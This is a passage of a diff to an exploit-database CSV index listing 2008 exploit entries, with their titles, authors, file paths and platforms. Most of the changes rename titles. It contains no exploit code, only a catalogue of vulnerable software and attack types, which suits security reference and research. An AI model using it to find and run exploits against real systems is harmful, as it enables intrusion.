Vulnerabilities",2008-10-23,xy7,php,webapps,0 @@ -6412,7 +6413,7 @@ id,file,description,date,author,platform,type,port 6842,platforms/php/webapps/6842.txt,"WordPress Media Holder - 'mediaHolder.php id' SQL Injection",2008-10-26,boom3rang,php,webapps,0 6843,platforms/php/webapps/6843.txt,"SFS Ez Forum - 'forum.php id' SQL Injection",2008-10-26,Hurley,php,webapps,0 6844,platforms/php/webapps/6844.pl,"MyForum 1.3 - (lecture.php id) SQL Injection",2008-10-26,Vrs-hCk,php,webapps,0 -6845,platforms/cgi/webapps/6845.txt,"Ads Pro - 'dhtml.pl' Remote Command Execution Exploit",2008-10-26,S0l1D,cgi,webapps,0 +6845,platforms/cgi/webapps/6845.txt,"Ads Pro - 'dhtml.pl' Remote Command Execution",2008-10-26,S0l1D,cgi,webapps,0 6846,platforms/php/webapps/6846.txt,"MyForum 1.3 - (padmin) Local File Inclusion",2008-10-27,Vrs-hCk,php,webapps,0 6847,platforms/php/webapps/6847.txt,"Persia BME E-Catalogue - SQL Injection",2008-10-27,BugReport.IR,php,webapps,0 6848,platforms/php/webapps/6848.txt,"TlAds 1.0 - Remote Insecure Cookie Handling",2008-10-27,x0r,php,webapps,0 @@ -6428,14 +6429,14 @@ id,file,description,date,author,platform,type,port 6858,platforms/php/webapps/6858.txt,"PersianBB - 'iranian_music.php id' SQL Injection",2008-10-28,"Hussin X",php,webapps,0 6859,platforms/php/webapps/6859.txt,"Agares ThemeSiteScript 1.0 (loadadminpage) - Remote File Inclusion",2008-10-28,DaRkLiFe,php,webapps,0 6860,platforms/php/webapps/6860.txt,"TlGuestBook 1.2 - Insecure Cookie Handling",2008-10-28,x0r,php,webapps,0 -6861,platforms/php/webapps/6861.pl,"H2O-CMS 3.4 - Remote Command Execution Exploit (mq = off)",2008-10-28,StAkeR,php,webapps,0 +6861,platforms/php/webapps/6861.pl,"H2O-CMS 3.4 - Remote Command Execution (mq = off)",2008-10-28,StAkeR,php,webapps,0 6862,platforms/php/webapps/6862.txt,"H2O-CMS 3.4 - Insecure Cookie Handling",2008-10-29,Stack,php,webapps,0 6863,platforms/windows/dos/6863.pl,"PacketTrap TFTPD 2.2.5459.0 - Remote Denial of Service",2008-10-29,"Jeremy Brown",windows,dos,0 6864,platforms/cgi/webapps/6864.txt,"Sepal SPBOARD 4.5 - (board.cgi) Remote Command Execution",2008-10-29,GoLd_M,cgi,webapps,0 -6865,platforms/php/webapps/6865.txt,"e107 plugin fm pro 1 - (File Disclosure / File Upload / Directory Traversal) Multiple Vulnerabilities",2008-10-29,GoLd_M,php,webapps,0 -6866,platforms/php/webapps/6866.pl,"7Shop 1.1 - Arbitrary File Upload Exploit",2008-10-29,t0pP8uZz,php,webapps,0 -6867,platforms/php/webapps/6867.pl,"WordPress Plugin E-Commerce 3.4 - Arbitrary File Upload Exploit",2008-10-29,t0pP8uZz,php,webapps,0 -6868,platforms/php/webapps/6868.pl,"Mambo Component SimpleBoard 1.0.1 - Arbitrary File Upload Exploit",2008-10-29,t0pP8uZz,php,webapps,0 +6865,platforms/php/webapps/6865.txt,"e107 plugin fm pro 1 - (File Disclosure / Arbitrary File Upload / Directory Traversal) Multiple Vulnerabilities",2008-10-29,GoLd_M,php,webapps,0 +6866,platforms/php/webapps/6866.pl,"7Shop 1.1 - Arbitrary File Upload",2008-10-29,t0pP8uZz,php,webapps,0 +6867,platforms/php/webapps/6867.pl,"WordPress Plugin E-Commerce 3.4 - Arbitrary File Upload",2008-10-29,t0pP8uZz,php,webapps,0 +6868,platforms/php/webapps/6868.pl,"Mambo Component SimpleBoard 1.0.1 - Arbitrary File Upload",2008-10-29,t0pP8uZz,php,webapps,0 6869,platforms/php/webapps/6869.txt,"WebCards 1.3 - SQL Injection",2008-10-29,t0pP8uZz,php,webapps,0 6870,platforms/windows/remote/6870.html,"MW6 Aztec ActiveX - 'Aztec.dll' Remote Insecure Method Exploit",2008-10-29,DeltahackingTEAM,windows,remote,0 6871,platforms/windows/remote/6871.html,"MW6 Barcode ActiveX - 'Barcode.dll' Insecure Method Exploit",2008-10-29,DeltahackingTEAM,windows,remote,0 @@ -6555,7 +6556,7 @@ id,file,description,date,author,platform,type,port 6988,platforms/php/webapps/6988.txt,"Tours Manager 1.0 - (cityview.php cityid) SQL Injection",2008-11-04,G4N0K,php,webapps,0 6989,platforms/php/webapps/6989.txt,"WEBBDOMAIN Post Card 1.02 - (SQL Injection) Authentication Bypass",2008-11-04,x0r,php,webapps,0 6990,platforms/php/webapps/6990.txt,"nicLOR Sito - includefile Local File Inclusion",2008-11-04,StAkeR,php,webapps,0 -6991,platforms/php/webapps/6991.txt,"TR News 2.1 - 'login.php' Remote Login Bypass Exploit",2008-11-04,StAkeR,php,webapps,0 +6991,platforms/php/webapps/6991.txt,"TR News 2.1 - 'login.php' Remote Login Bypass",2008-11-04,StAkeR,php,webapps,0 6992,platforms/php/webapps/6992.txt,"wotw 5.0 - Local / Remote File Inclusion",2008-11-04,dun,php,webapps,0 6993,platforms/php/webapps/6993.php,"Simple Machines Forum (SMF) 1.1.6 - Code Execution",2008-11-04,"Charles Fol",php,webapps,0 6994,platforms/windows/local/6994.txt,"Adobe Reader - util.printf() JavaScript Function Stack Overflow (1)",2008-11-05,Elazar,windows,local,0 @@ -6620,11 +6621,11 @@ id,file,description,date,author,platform,type,port 7055,platforms/hardware/remote/7055.txt,"SpeedStream 5200 - Authentication Bypass Config Download",2008-11-07,hkm,hardware,remote,0 7056,platforms/windows/remote/7056.rb,"GE Proficy Real Time Information Portal - Credentials Leak Sniffer (Metasploit)",2008-11-08,"Kevin Finisterre",windows,remote,0 7057,platforms/php/webapps/7057.pl,"MemHT Portal 4.0 - Remote Code Execution",2008-11-08,Ams,php,webapps,0 -7058,platforms/php/webapps/7058.txt,"zeeproperty 1.0 - (File Upload / Cross-Site Scripting) Multiple Vulnerabilities",2008-11-08,ZoRLu,php,webapps,0 +7058,platforms/php/webapps/7058.txt,"zeeproperty 1.0 - (Arbitrary File Upload / Cross-Site Scripting) Multiple Vulnerabilities",2008-11-08,ZoRLu,php,webapps,0 7059,platforms/php/webapps/7059.txt,"Enthusiast 3.1.4 - (show_joined.php path) Remote File Inclusion",2008-11-08,BugReport.IR,php,webapps,0 7060,platforms/hardware/dos/7060.txt,"2WIRE DSL Router (xslt) - Denial of Service",2008-11-08,hkm,hardware,dos,0 7061,platforms/php/webapps/7061.txt,"V3 Chat Profiles/Dating Script 3.0.2 - (Authentication Bypass) SQL Injection",2008-11-08,d3b4g,php,webapps,0 -7062,platforms/php/webapps/7062.txt,"ZeeJobsite 2.0 - Remote File Upload",2008-11-08,ZoRLu,php,webapps,0 +7062,platforms/php/webapps/7062.txt,"ZeeJobsite 2.0 - Arbitrary File Upload",2008-11-08,ZoRLu,php,webapps,0 7063,platforms/php/webapps/7063.txt,"V3 Chat Profiles/Dating Script 3.0.2 - Insecure Cookie Handling",2008-11-08,Stack,php,webapps,0 7064,platforms/php/webapps/7064.pl,"Mambo Component n-form - (form_id) Blind SQL Injection",2008-11-08,boom3rang,php,webapps,0 7065,platforms/php/webapps/7065.txt,"Cyberfolio 7.12.2 - (css.php theme) Local File Inclusion",2008-11-08,dun,php,webapps,0 @@ -6637,19 +6638,19 @@ id,file,description,date,author,platform,type,port 7072,platforms/php/webapps/7072.txt,"ZEEMATRI 3.0 - (bannerclick.php adid) SQL Injection",2008-11-09,"Hussin X",php,webapps,0 7074,platforms/php/webapps/7074.txt,"X10media Mp3 Search Engine 1.6 - Remote File Disclosure",2008-11-09,THUNDER,php,webapps,0 7075,platforms/jsp/webapps/7075.txt,"Openfire Server 3.6.0a - (Authentication Bypass / SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-11-09,"Andreas Kurtz",jsp,webapps,0 -7076,platforms/php/webapps/7076.txt,"Collabtive 0.4.8 - (Cross-Site Scripting / Authentication Bypass / File Upload) Multiple Vulnerabilities",2008-11-10,USH,php,webapps,0 +7076,platforms/php/webapps/7076.txt,"Collabtive 0.4.8 - (Cross-Site Scripting / Authentication Bypass / Arbitrary File Upload) Multiple Vulnerabilities",2008-11-10,USH,php,webapps,0 7077,platforms/php/webapps/7077.txt,"OTManager CMS 2.4 - (Tipo) Remote File Inclusion",2008-11-10,Colt7r,php,webapps,0 7078,platforms/php/webapps/7078.txt,"Joomla Component JooBlog 0.1.1 - (PostID) SQL Injection",2008-11-10,boom3rang,php,webapps,0 7079,platforms/php/webapps/7079.txt,"FREEsimplePHPGuestbook - 'Guestbook.php' Remote Code Execution",2008-11-10,GoLd_M,php,webapps,0 7080,platforms/php/webapps/7080.txt,"fresh email script 1.0 - Multiple Vulnerabilities",2008-11-10,Don,php,webapps,0 7081,platforms/php/webapps/7081.txt,"AJ ARTICLE - Remote Authentication Bypass",2008-11-10,G4N0K,php,webapps,0 -7082,platforms/php/webapps/7082.txt,"PHPStore Car Dealers - Remote File Upload",2008-11-10,ZoRLu,php,webapps,0 -7083,platforms/php/webapps/7083.txt,"PHPStore PHP Job Search Script - Remote File Upload",2008-11-10,ZoRLu,php,webapps,0 +7082,platforms/php/webapps/7082.txt,"PHPStore Car Dealers - Arbitrary File Upload",2008-11-10,ZoRLu,php,webapps,0 +7083,platforms/php/webapps/7083.txt,"PHPStore PHP Job Search Script - Arbitrary File Upload",2008-11-10,ZoRLu,php,webapps,0 7084,platforms/php/webapps/7084.txt,"PHPStore Complete Classifieds Script - Arbitrary File Upload",2008-11-10,ZoRLu,php,webapps,0 -7085,platforms/php/webapps/7085.txt,"PHPStore Real Estate - Remote File Upload",2008-11-10,ZoRLu,php,webapps,0 +7085,platforms/php/webapps/7085.txt,"PHPStore Real Estate - Arbitrary File Upload",2008-11-10,ZoRLu,php,webapps,0 7086,platforms/php/webapps/7086.txt,"AJSquare Free Polling Script - (DB) Multiple Vulnerabilities",2008-11-10,G4N0K,php,webapps,0 -7087,platforms/php/webapps/7087.txt,"AJ Auction Authentication - Bypass",2008-11-10,G4N0K,php,webapps,0 -7088,platforms/osx/dos/7088.txt,"smcFanControl 2.1.2 (OS X) - Multiple Buffer Overflow Vulnerabilities (PoC)",2008-11-11,xwings,osx,dos,0 +7087,platforms/php/webapps/7087.txt,"AJ Auction Authentication - Bypass Exploit",2008-11-10,G4N0K,php,webapps,0 +7088,platforms/osx/dos/7088.txt,"smcFanControl 2.1.2 (OSX) - Multiple Buffer Overflow Vulnerabilities (PoC)",2008-11-11,xwings,osx,dos,0 7089,platforms/php/webapps/7089.txt,"Aj Classifieds - Authentication Bypass",2008-11-11,G4N0K,php,webapps,0 7090,platforms/windows/dos/7090.txt,"ooVoo 1.7.1.35 - (URL Protocol) Remote Unicode Buffer Overflow (PoC)",2008-11-11,Nine:Situations:Group,windows,dos,0 7091,platforms/linux/dos/7091.c,"Linux Kernel < 2.4.36.9 / 2.6.27.5 - Unix Sockets Local Kernel Panic Exploit",2008-11-11,"Andrea Bittau",linux,dos,0 @@ -6662,7 +6663,7 @@ id,file,description,date,author,platform,type,port 7098,platforms/php/webapps/7098.txt,"PozScripts Business Directory Script - 'cid' SQL Injection",2008-11-11,"Hussin X",php,webapps,0 7099,platforms/windows/dos/7099.pl,"Castle Rock Computing SNMPc < 7.1.1 - (Community) Remote Buffer Overflow (PoC)",2008-11-12,"Praveen Darshanam",windows,dos,0 7100,platforms/linux/dos/7100.pl,"Net-SNMP 5.1.4/5.2.4/5.4.1 Perl Module - Buffer Overflow (PoC)",2008-11-12,"Praveen Darshanam",linux,dos,0 -7101,platforms/php/webapps/7101.txt,"Alstrasoft SendIt Pro - Remote File Upload",2008-11-12,ZoRLu,php,webapps,0 +7101,platforms/php/webapps/7101.txt,"Alstrasoft SendIt Pro - Arbitrary File Upload",2008-11-12,ZoRLu,php,webapps,0 7102,platforms/php/webapps/7102.txt,"Alstrasoft Article Manager Pro - (Authentication Bypass) SQL Injection",2008-11-12,ZoRLu,php,webapps,0 7103,platforms/php/webapps/7103.txt,"Alstrasoft Web Host Directory - (Authentication Bypass) SQL Injection",2008-11-12,ZoRLu,php,webapps,0 7104,platforms/windows/remote/7104.c,"Microsoft Windows Server - Code Execution (MS08-067)",2008-11-12,Polymorphours,windows,remote,135 @@ -6671,8 +6672,8 @@ id,file,description,date,author,platform,type,port 7107,platforms/php/webapps/7107.txt,"TurnkeyForms Web Hosting Directory - Multiple Vulnerabilities",2008-11-12,G4N0K,php,webapps,0 7109,platforms/windows/dos/7109.txt,"Pi3Web 2.0.3 - (ISAPI) Remote Denial of Service",2008-11-13,"Hamid Ebadi",windows,dos,0 7110,platforms/php/webapps/7110.txt,"ScriptsFeed (SF) Real Estate Classifieds Software - Arbitrary File Upload",2008-11-13,ZoRLu,php,webapps,0 -7111,platforms/php/webapps/7111.txt,"ScriptsFeed (SF) Auto Classifieds Software - Remote File Upload",2008-11-13,ZoRLu,php,webapps,0 -7112,platforms/php/webapps/7112.txt,"ScriptsFeed (SF) Recipes Listing Portal - Remote File Upload",2008-11-13,ZoRLu,php,webapps,0 +7111,platforms/php/webapps/7111.txt,"ScriptsFeed (SF) Auto Classifieds Software - Arbitrary File Upload",2008-11-13,ZoRLu,php,webapps,0 +7112,platforms/php/webapps/7112.txt,"ScriptsFeed (SF) Recipes Listing Portal - Arbitrary File Upload",2008-11-13,ZoRLu,php,webapps,0 7113,platforms/php/webapps/7113.txt,"BandSite CMS 1.1.4 - Insecure Cookie Handling",2008-11-13,Stack,php,webapps,0 7114,platforms/php/webapps/7114.txt,"MemHT Portal 4.0.1 - SQL Injection Code Execution",2008-11-13,Ams,php,webapps,0 7116,platforms/php/webapps/7116.txt,"Alstrasoft Web Host Directory 1.2 - Multiple Vulnerabilities",2008-11-14,G4N0K,php,webapps,0 @@ -6688,7 +6689,7 @@ id,file,description,date,author,platform,type,port 7126,platforms/windows/dos/7126.html,"VeryPDF PDFView - OCX ActiveX OpenPDF Heap Overflow (PoC)",2008-11-15,r0ut3r,windows,dos,0 7128,platforms/php/webapps/7128.txt,"ClipShare Pro 2006-2007 - (chid) SQL Injection",2008-11-15,snakespc,php,webapps,0 7129,platforms/multiple/local/7129.sh,"Sudo 1.6.9p18 - (Defaults setenv) Privilege Escalation",2008-11-15,kingcope,multiple,local,0 -7130,platforms/php/webapps/7130.php,"Minigal b13 - 'index.php list' Remote File Disclosure Exploit",2008-11-15,"Alfons Luja",php,webapps,0 +7130,platforms/php/webapps/7130.php,"Minigal b13 - 'index.php list' Remote File Disclosure",2008-11-15,"Alfons Luja",php,webapps,0 7131,platforms/php/webapps/7131.txt,"yahoo answers - 'id' SQL Injection",2008-11-16,snakespc,php,webapps,0 7132,platforms/windows/remote/7132.py,"Microsoft Windows Server 2000/2003 - Code Execution (MS08-067)",2008-11-16,"Debasis Mohanty",windows,remote,445 7133,platforms/php/webapps/7133.txt,"FloSites Blog - Multiple SQL Injections",2008-11-16,Vrs-hCk,php,webapps,0 @@ -6699,7 +6700,7 @@ id,file,description,date,author,platform,type,port 7138,platforms/php/webapps/7138.txt,"E-topbiz ADManager 4 - (group) Blind SQL Injection",2008-11-17,"Hussin X",php,webapps,0 7140,platforms/php/webapps/7140.txt,"FREEze Greetings 1.0 - Remote Password Retrieve Exploit",2008-11-17,cOndemned,php,webapps,0 7141,platforms/asp/webapps/7141.txt,"Q-Shop 3.0 - Remote Cross-Site Scripting / SQL Injection",2008-11-17,Bl@ckbe@rD,asp,webapps,0 -7142,platforms/windows/remote/7142.html,"Chilkat Socket ActiveX 2.3.1.1 - Arbitrary File Creation Exploit",2008-11-17,Zigma,windows,remote,0 +7142,platforms/windows/remote/7142.html,"Chilkat Socket ActiveX 2.3.1.1 - Arbitrary File Creation",2008-11-17,Zigma,windows,remote,0 7143,platforms/php/webapps/7143.txt,"PHPfan 3.3.4 - (init.php includepath) Remote File Inclusion",2008-11-17,ahmadbady,php,webapps,0 7144,platforms/php/webapps/7144.txt,"Jadu Galaxies - 'categoryId' Blind SQL Injection",2008-11-17,ZoRLu,php,webapps,0 7145,platforms/windows/remote/7145.txt,"Exodus 0.10 - (URI handler) Arbitrary Parameter Injection (1)",2008-11-17,Nine:Situations:Group,windows,remote,0 @@ -6707,7 +6708,7 @@ id,file,description,date,author,platform,type,port 7147,platforms/php/webapps/7147.txt,"SaturnCMS - (view) Blind SQL Injection",2008-11-17,"Hussin X",php,webapps,0 7148,platforms/php/webapps/7148.txt,"Ultrastats 0.2.144/0.3.11 - (index.php serverid) SQL Injection",2008-11-17,eek,php,webapps,0 7149,platforms/php/webapps/7149.php,"VideoScript 4.0.1.50 - Admin Change Password Exploit",2008-11-17,G4N0K,php,webapps,0 -7150,platforms/linux/dos/7150.html,"CUPS 1.3.7 - Cross-Site Request Forgery (add rss subscription) Remote Crash Exploit",2008-11-18,"Adrian ""pagvac"" Pastor",linux,dos,0 +7150,platforms/linux/dos/7150.html,"CUPS 1.3.7 - Cross-Site Request Forgery (add rss subscription) Remote Crash",2008-11-18,"Adrian ""pagvac"" Pastor",linux,dos,0 7151,platforms/linux/remote/7151.c,"No-IP DUC 2.1.7 - Remote Code Execution",2008-11-18,XenoMuta,linux,remote,0 7152,platforms/php/webapps/7152.txt,"MusicBox 2.3.8 - (viewalbums.php artistId) SQL Injection",2008-11-18,snakespc,php,webapps,0 7153,platforms/php/webapps/7153.txt,"Pluck CMS 4.5.3 - (g_pcltar_lib_dir) Local File Inclusion",2008-11-18,DSecRG,php,webapps,0 @@ -6720,7 +6721,7 @@ id,file,description,date,author,platform,type,port 7162,platforms/php/webapps/7162.pl,"MauryCMS 0.53.2 - Arbitrary File Upload",2008-11-19,StAkeR,php,webapps,0 7163,platforms/php/webapps/7163.txt,"RevSense - (Authentication Bypass) SQL Injection",2008-11-19,d3b4g,php,webapps,0 7164,platforms/php/webapps/7164.txt,"Pre Job Board - (Authentication Bypass) SQL Injection",2008-11-19,R3d-D3V!L,php,webapps,0 -7165,platforms/php/webapps/7165.pl,"wPortfolio 0.3 - Arbitrary File Upload Exploit",2008-11-19,Osirys,php,webapps,0 +7165,platforms/php/webapps/7165.pl,"wPortfolio 0.3 - Arbitrary File Upload",2008-11-19,Osirys,php,webapps,0 7166,platforms/php/webapps/7166.txt,"AskPert - (Authentication Bypass) SQL Injection",2008-11-19,TR-ShaRk,php,webapps,0 7167,platforms/windows/remote/7167.html,"Exodus 0.10 - (URI handler) Arbitrary Parameter Injection (2)",2008-11-20,Nine:Situations:Group,windows,remote,0 7168,platforms/php/webapps/7168.pl,"PunBB Mod PunPortal 0.1 - Local File Inclusion",2008-11-20,StAkeR,php,webapps,0 @@ -6735,19 +6736,19 @@ id,file,description,date,author,platform,type,port 7178,platforms/windows/dos/7178.txt,"BitDefender - (module pdf.xmd) Infinite Loop Denial of Service (PoC)",2008-11-20,ProTeuS,windows,dos,0 7179,platforms/php/webapps/7179.txt,"Natterchat 1.1 - Remote Authentication Bypass",2008-11-20,Stack,php,webapps,0 7180,platforms/php/webapps/7180.txt,"VCalendar - 'VCalendar.mdb' Remote Database Disclosure",2008-11-20,Swan,php,webapps,0 -7181,platforms/windows/remote/7181.html,"KVIrc 3.4.2 Shiny - (URI handler) Remote Command Execution Exploit",2008-11-21,Nine:Situations:Group,windows,remote,0 +7181,platforms/windows/remote/7181.html,"KVIrc 3.4.2 Shiny - (URI handler) Remote Command Execution",2008-11-21,Nine:Situations:Group,windows,remote,0 7182,platforms/php/webapps/7182.txt,"Joomla Component Thyme 1.0 - (event) SQL Injection",2008-11-21,"Ded MustD!e",php,webapps,0 7183,platforms/linux/remote/7183.txt,"verlihub 0.9.8d-RC2 - Remote Command Execution",2008-11-21,v4lkyrius,linux,remote,0 7184,platforms/php/webapps/7184.txt,"e107 Plugin ZoGo-Shop 1.15.4 - (product) SQL Injection",2008-11-22,NoGe,php,webapps,0 7185,platforms/php/webapps/7185.php,"Discuz! - Remote Reset User Password Exploit",2008-11-22,80vul,php,webapps,0 7186,platforms/php/webapps/7186.txt,"Vlog System 1.1 - (blog.php user) SQL Injection",2008-11-22,Mr.SQL,php,webapps,0 -7188,platforms/php/webapps/7188.txt,"getaphpsite Real Estate - Remote File Upload",2008-11-22,ZoRLu,php,webapps,0 -7189,platforms/php/webapps/7189.txt,"getaphpsite Auto Dealers - Remote File Upload",2008-11-22,ZoRLu,php,webapps,0 +7188,platforms/php/webapps/7188.txt,"getaphpsite Real Estate - Arbitrary File Upload",2008-11-22,ZoRLu,php,webapps,0 +7189,platforms/php/webapps/7189.txt,"getaphpsite Auto Dealers - Arbitrary File Upload",2008-11-22,ZoRLu,php,webapps,0 7190,platforms/php/webapps/7190.txt,"Ez Ringtone Manager - Multiple Remote File Disclosure Vulnerabilities",2008-11-22,b3hz4d,php,webapps,0 -7191,platforms/php/webapps/7191.php,"LoveCMS 1.6.2 Final (Simple Forum 3.1d) - Change Admin Password Exploit",2008-11-22,cOndemned,php,webapps,0 +7191,platforms/php/webapps/7191.php,"LoveCMS 1.6.2 Final (Simple Forum 3.1d) - Change Admin Password",2008-11-22,cOndemned,php,webapps,0 7195,platforms/php/webapps/7195.txt,"Prozilla Hosting Index - 'id' SQL Injection",2008-11-23,snakespc,php,webapps,0 7196,platforms/windows/remote/7196.html,"Microsoft XML Core Services DTD - Cross-Domain Scripting PoC (MS08-069)",2008-11-23,"Jerome Athias",windows,remote,0 -7197,platforms/php/webapps/7197.txt,"Goople CMS 1.7 - Remote File Upload",2008-11-23,x0r,php,webapps,0 +7197,platforms/php/webapps/7197.txt,"Goople CMS 1.7 - Arbitrary File Upload",2008-11-23,x0r,php,webapps,0 7198,platforms/php/webapps/7198.txt,"Netartmedia Cars Portal 2.0 - (image.php id) SQL Injection",2008-11-23,snakespc,php,webapps,0 7199,platforms/php/webapps/7199.txt,"Netartmedia Blog System - 'image.php id' SQL Injection",2008-11-23,snakespc,php,webapps,0 7200,platforms/php/webapps/7200.txt,"PG Real Estate - (Authentication Bypass) SQL Injection",2008-11-23,ZoRLu,php,webapps,0 @@ -6768,7 +6769,7 @@ id,file,description,date,author,platform,type,port 7216,platforms/php/webapps/7216.txt,"WebStudio CMS - 'index.php pageid' Blind SQL Injection",2008-11-24,"Glafkos Charalambous ",php,webapps,0 7217,platforms/php/webapps/7217.pl,"Quicksilver Forums 1.4.2 (Windows) - Remote Code Execution",2008-11-24,girex,php,webapps,0 7218,platforms/php/webapps/7218.txt,"nitrotech 0.0.3a - (Remote File Inclusion / SQL Injection) Multiple Vulnerabilities",2008-11-24,Osirys,php,webapps,0 -7219,platforms/windows/dos/7219.pl,"Total Video Player - 'vcen.dll' Remote Off-by-One Crash Exploit",2008-11-24,Cnaph,windows,dos,0 +7219,platforms/windows/dos/7219.pl,"Total Video Player - 'vcen.dll' Remote Off-by-One Crash",2008-11-24,Cnaph,windows,dos,0 7220,platforms/hardware/dos/7220.txt,"Siemens C450IP/C475IP - Remote Denial of Service",2008-11-24,"sky & Any",hardware,dos,0 7221,platforms/php/webapps/7221.txt,"Pie Web M{a_e}sher 0.5.3 - Multiple Remote File Inclusion",2008-11-24,NoGe,php,webapps,0 7222,platforms/php/webapps/7222.txt,"WebStudio eHotel - (pageid) Blind SQL Injection",2008-11-25,"Hussin X",php,webapps,0 @@ -6782,7 +6783,7 @@ id,file,description,date,author,platform,type,port 7230,platforms/php/webapps/7230.pl,"Clean CMS 1.5 - (full_txt.php id) Blind SQL Injection",2008-11-25,JosS,php,webapps,0 7231,platforms/php/webapps/7231.txt,"Fuzzylime CMS 3.03 - (track.php p) Local File Inclusion",2008-11-25,"Alfons Luja",php,webapps,0 7232,platforms/php/webapps/7232.txt,"SimpleBlog 3.0 - (simpleBlog.mdb) Database Disclosure",2008-11-25,EL_MuHaMMeD,php,webapps,0 -7233,platforms/php/webapps/7233.txt,"LoveCMS 1.6.2 Final (Download Manager 1.0) - File Upload Exploit",2008-11-25,cOndemned,php,webapps,0 +7233,platforms/php/webapps/7233.txt,"LoveCMS 1.6.2 Final (Download Manager 1.0) - Arbitrary File Upload",2008-11-25,cOndemned,php,webapps,0 7234,platforms/php/webapps/7234.txt,"VideoGirls BiZ - 'view_snaps.php type' Blind SQL Injection",2008-11-25,Cyber-Zone,php,webapps,0 7235,platforms/php/webapps/7235.txt,"Jamit Job Board 3.x - (show_emp) Blind SQL Injection",2008-11-25,XaDoS,php,webapps,0 7236,platforms/php/webapps/7236.txt,"WebStudio CMS - (pageid) Blind SQL Injection (mil mixup)",2008-11-26,"BorN To K!LL",php,webapps,0 @@ -6800,7 +6801,7 @@ id,file,description,date,author,platform,type,port 7248,platforms/php/webapps/7248.txt,"Family Project 2.x - (Authentication Bypass) SQL Injection",2008-11-27,The_5p3ctrum,php,webapps,0 7249,platforms/windows/dos/7249.php,"i.Scribe SMTP Client 2.00b - (wscanf) Remote Format String (PoC)",2008-11-27,"Alfons Luja",windows,dos,0 7250,platforms/php/webapps/7250.txt,"RakhiSoftware Shopping Cart - (subcategory_id) SQL Injection",2008-11-27,XaDoS,php,webapps,0 -7251,platforms/php/webapps/7251.txt,"Star Articles 6.0 - Remote File Upload",2008-11-27,ZoRLu,php,webapps,0 +7251,platforms/php/webapps/7251.txt,"Star Articles 6.0 - Arbitrary File Upload",2008-11-27,ZoRLu,php,webapps,0 7252,platforms/php/webapps/7252.txt,"Web Calendar 4.1 - (Authentication Bypass) SQL Injection",2008-11-27,Cyber-Zone,php,webapps,0 7253,platforms/php/webapps/7253.txt,"Booking Centre 2.01 - (HotelID) SQL Injection",2008-11-27,R3d-D3V!L,php,webapps,0 7254,platforms/php/webapps/7254.txt,"Ocean12 Membership Manager Pro - (Authentication Bypass) SQL Injection",2008-11-27,Cyber-Zone,php,webapps,0 @@ -6852,28 +6853,28 @@ id,file,description,date,author,platform,type,port 7303,platforms/php/webapps/7303.txt,"Quick Tree View .NET 3.1 - (qtv.mdb) Database Disclosure",2008-11-30,Cyber-Zone,php,webapps,0 7304,platforms/php/webapps/7304.pl,"KTP Computer Customer Database CMS 1.0 - Local File Inclusion",2008-11-30,"CWH Underground",php,webapps,0 7305,platforms/php/webapps/7305.txt,"KTP Computer Customer Database CMS 1.0 - Blind SQL Injection",2008-11-30,"CWH Underground",php,webapps,0 -7306,platforms/php/webapps/7306.txt,"minimal ablog 0.4 - (SQL Injection / File Upload / Authentication Bypass) Multiple Vulnerabilities",2008-11-30,NoGe,php,webapps,0 +7306,platforms/php/webapps/7306.txt,"minimal ablog 0.4 - (SQL Injection / Arbitrary File Upload / Authentication Bypass) Multiple Vulnerabilities",2008-11-30,NoGe,php,webapps,0 7307,platforms/windows/dos/7307.txt,"Electronics Workbench - '.ewb' Local Stack Overflow (PoC)",2008-11-30,Zigma,windows,dos,0 7308,platforms/php/webapps/7308.txt,"cpCommerce 1.2.6 - (URL Rewrite) Input Variable Overwrite / Authentication Bypass",2008-11-30,girex,php,webapps,0 7309,platforms/windows/local/7309.pl,"Cain & Abel 4.9.24 - '.rdp' Stack Overflow",2008-11-30,SkD,windows,local,0 7310,platforms/php/webapps/7310.txt,"Broadcast Machine 0.1 - Multiple Remote File Inclusion",2008-11-30,NoGe,php,webapps,0 7311,platforms/php/webapps/7311.txt,"z1exchange 1.0 - (edit.php site) SQL Injection",2008-12-01,JIKO,php,webapps,0 7312,platforms/php/webapps/7312.txt,"Andy's PHP KnowledgeBase 0.92.9 - Arbitrary File Upload",2008-12-01,"CWH Underground",php,webapps,0 -7313,platforms/linux/local/7313.sh,"Debian GNU/Linux - (symlink attack in login) Arbitrary File Ownership (PoC)",2008-12-01,"Paul Szabo",linux,local,0 +7313,platforms/linux/local/7313.sh,"Debian - (symlink attack in login) Arbitrary File Ownership (PoC)",2008-12-01,"Paul Szabo",linux,local,0 7314,platforms/windows/dos/7314.txt,"Maxum Rumpus 6.0 - Multiple Remote Buffer Overflow Vulnerabilities",2008-12-01,"BLUE MOON",windows,dos,0 7315,platforms/php/webapps/7315.txt,"E.Z. Poll 2 - (Authentication Bypass) SQL Injection",2008-12-01,t0fx,php,webapps,0 7316,platforms/asp/webapps/7316.txt,"ASPPortal 3.2.5 - (ASPPortal.mdb) Database Disclosure",2008-12-01,"CWH Underground",asp,webapps,0 7317,platforms/php/webapps/7317.pl,"bcoos 1.0.13 - (viewcat.php cid) SQL Injection",2008-12-01,"CWH Underground",php,webapps,0 7318,platforms/php/webapps/7318.txt,"PacPoll 4.0 - (poll.mdb/poll97.mdb) Database Disclosure",2008-12-01,AlpHaNiX,php,webapps,0 7319,platforms/php/webapps/7319.txt,"Ocean12 Mailing List Manager Gold - File Disclosure / SQL Injection / Cross-Site Scripting",2008-12-02,Pouya_Server,php,webapps,0 -7322,platforms/php/webapps/7322.pl,"CMS MAXSITE Component Guestbook - Remote Command Execution Exploit",2008-12-02,"CWH Underground",php,webapps,0 +7322,platforms/php/webapps/7322.pl,"CMS MAXSITE Component Guestbook - Remote Command Execution",2008-12-02,"CWH Underground",php,webapps,0 7323,platforms/php/webapps/7323.txt,"SunByte e-Flower - 'id' SQL Injection",2008-12-02,w4rl0ck,php,webapps,0 7324,platforms/php/webapps/7324.txt,"Rapid Classified 3.1 - (cldb.mdb) Database Disclosure",2008-12-02,CoBRa_21,php,webapps,0 7325,platforms/asp/webapps/7325.txt,"Codefixer MailingListPro (MailingList.mdb) - Database Disclosure",2008-12-02,AlpHaNiX,asp,webapps,0 7326,platforms/asp/webapps/7326.txt,"Gallery MX 2.0.0 - (pics_pre.asp ID) Blind SQL Injection",2008-12-03,R3d-D3V!L,asp,webapps,0 7327,platforms/asp/webapps/7327.txt,"Calendar MX Professional 2.0.0 - Blind SQL Injection",2008-12-03,R3d-D3V!L,asp,webapps,0 7328,platforms/php/webapps/7328.pl,"Check New 4.52 - (findoffice.php search) SQL Injection",2008-12-03,"CWH 